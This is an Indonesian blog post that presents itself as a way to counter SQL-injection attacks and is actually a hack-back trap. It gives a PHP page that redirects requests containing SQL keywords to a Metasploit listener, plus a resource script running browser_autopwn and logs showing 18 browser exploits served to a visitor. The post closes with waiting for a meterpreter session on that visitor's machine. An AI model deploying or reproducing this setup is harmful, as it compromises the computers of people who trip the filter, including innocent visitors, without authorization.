| Filename | menangkal serangan sqli dengan metasploit |
| Permission | rw-r--r-- |
| Author | Indonesian Security Down |
| Date and Time | 02.44 |
| Label | |
| Action |
Hallo semua... kali ini saya ingin sharing , cara menangkal serangan sqli pada sebuah web,, menggunakan metasploit,,,,
Kebanyakan para attacker itu menggunakan windows,,,,
nah ini merupakan kesempatan bagi kita untuk melakukan serangan balik...
langsung aja nh ,,, maaf klo repost....
buat script index.php
Code:
<?php
if (isset($_GET['xnod']) && preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr|\s)/i', $_GET['xnod']))
{
header('Location: http://192.168.1.100:4444');
}
?>
<html>
<body>
Silahkan dicoba
<a href="?xnod=2">test 1</a> - <a href="?xnod=2">test 2</a>- <a href="?xnod=6">test 3</a>
</body>
</html>
sipp sekrang buat script biar lebih mudah gunain metasploit
kasih nama antisqli.rc
Code:
# cat <<EOF> antisqli.rc
> use auxiliary/server/browser_autopwn
> set LHOST 192.168.100
> set SRVPORT 4444
> set URIPATH /
> run
> EOF
Nah sekarang kita jalanin metasploit sambil nunggu si attacker menyerang,,, sambil ngopi2 + makan gorengan..
./msfconsole -q -r antisqli.rc
silahkan tunggu smpe ada log seperti ini
Code:
192.168.1.5:1205 [302]: /?xnod=6%27
lama menunggu akhirnya ada jga yg kena nh..
Code:
msf auxiliary(browser_autopwn) >
[*] 192.168.1.5 browser_autopwn - Handling '/'
[*] 192.168.1.5 browser_autopwn - Handling '/?sessid=TWljcm9zb2Z0IFdpbmRvd3M6Nzp1bmRlZmluZWQ6ZW4tVVM6eDg2OkZpcmVmb3g6MTIuMDo%3d'
[*] 192.168.1.5 browser_autopwn - JavaScript Report: Microsoft Windows:7:undefined:en-US:x86:Firefox:12.0:
[*] 192.168.1.5 browser_autopwn - Responding with 18 exploits
nah tunggu smpe masuk meterpreter,,, dan selanjutnya terserah anda,,,,, wkwkkwk
Regards : ISD_andreas
0 komentar:
Posting Komentar